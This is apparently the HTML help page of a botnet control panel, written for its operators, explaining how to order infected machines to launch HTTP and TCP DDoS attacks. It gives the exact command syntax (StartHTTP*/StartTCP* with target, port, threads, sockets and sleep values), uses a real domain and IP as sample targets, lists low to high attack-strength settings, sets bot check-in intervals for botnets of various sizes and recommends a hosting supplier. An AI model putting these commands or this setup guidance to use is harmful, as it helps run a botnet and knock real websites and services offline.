<h3>Here are a few IMPORTANT things are described.

So I hope that I will get fewer questions :)</h3>
<hr />

<h2>DDoS (HTTP)</h2>
<ul>
  <li>For <b>HTTP</b> DDoS Attacks please <b>DO NOT enter</b> <b>www</b> oder <b>http://</b>This is done automatically by the bot.</li>
</ul>

<h3 style="color: blue">Example</h3>
<b>WRONG:</b> <b style="color: red;">StartHTTP*http://www.google.de*80*2*2*1</b><br />
<b>RICHTIG:</b> <b style="color: green;">StartHTTP*google.de*80*2*2*1</b>

<h3 style="color: blue">DDoS Adjust Strength</h3>
<b>Low:</b>2 Threads, 2 Sockets, Sleep: 1-100 (Example: StartHTTP*google.de*80*2*2*100)<br />
<b>Middle:</b>5 Threads, 5 Sockets, Sleep: 1 (Example: StartHTTP*google.de*80*5*5*1)<br />
<b>High:</b>10 Threads, 10 Sockets, Sleep: 1 (Example: StartHTTP*google.de*80*10*10*1)<br />

<p>I would not go higher.</p>

<hr style="border: 1px dotted black;" />

<h2>DDoS (TCP)</h2>
<ul>
  <li>For <b>TCP</b> DDoS attacks please <b>ONLY THE IP ADDRESS</b> to enter, not the host.</li>
</ul>

<h3 style="color: blue">Example</h3>
<b>WRONG:</b> <b style="color: red;">StartTCP*www.google.de*80*2*2*1</b><br />
<b>CORRECT:</b> <b style="color: green;">StartTCP*74.125.39.104*80*2*2*1</b>

<h3 style="color: blue">DDoS Strength Set</h3>
<b>Low:</b>2 Threads, 2 Sockets, Sleep: 1-100 (Example: StartTCP*74.125.39.104*80*2*2*100)<br />
<b>Middle:</b>5 Threads, 5 Sockets, Sleep: 100 (Example: StartTCP*74.125.39.104*80*5*5*100)<br />
<b>High:</b>10 Threads, 10 Sockets, Sleep: 1 (Example: StartTCP*74.125.39.104*80*10*10*1)<br />

<p>I would not go higher.</p>

<hr style="border: 1px dotted black;" />

<h2>Interval set properly</h2>
<p>You can in the builder and the panel in the config.php to set the interval</p>
<p>The interval is there that the bot is always connected to the panel after x seconds</p>
<p>If the bot is every <b>3 minutes (180 seconds)</b> connects to the panel, the panel you have to at least 181 seconds set</p>
<p>So always be one second longer. (Not specified in minutes!)</p>

<b>Recommended setting for middle botnet is:</b> 180 seconds in the Builder (3 min) and 185 seconds in the config.php <br />
<b>Recommended setting for larger botnet is:</b> 300 seconds in the Builder (5 min) and 305 seconds in the config.php <br />
<b>Recommended setting for a large botnet is:</b> 1800 seconds (30min) and 1805 seconds in the config.php<br />

<p>It can never be determined exactly, it is finally on the server!</p>
<b>Recommended suppliers: <b style="color: red;">2x4.ru</b>!</b>

<hr />
<h3>Have Fun!</h3>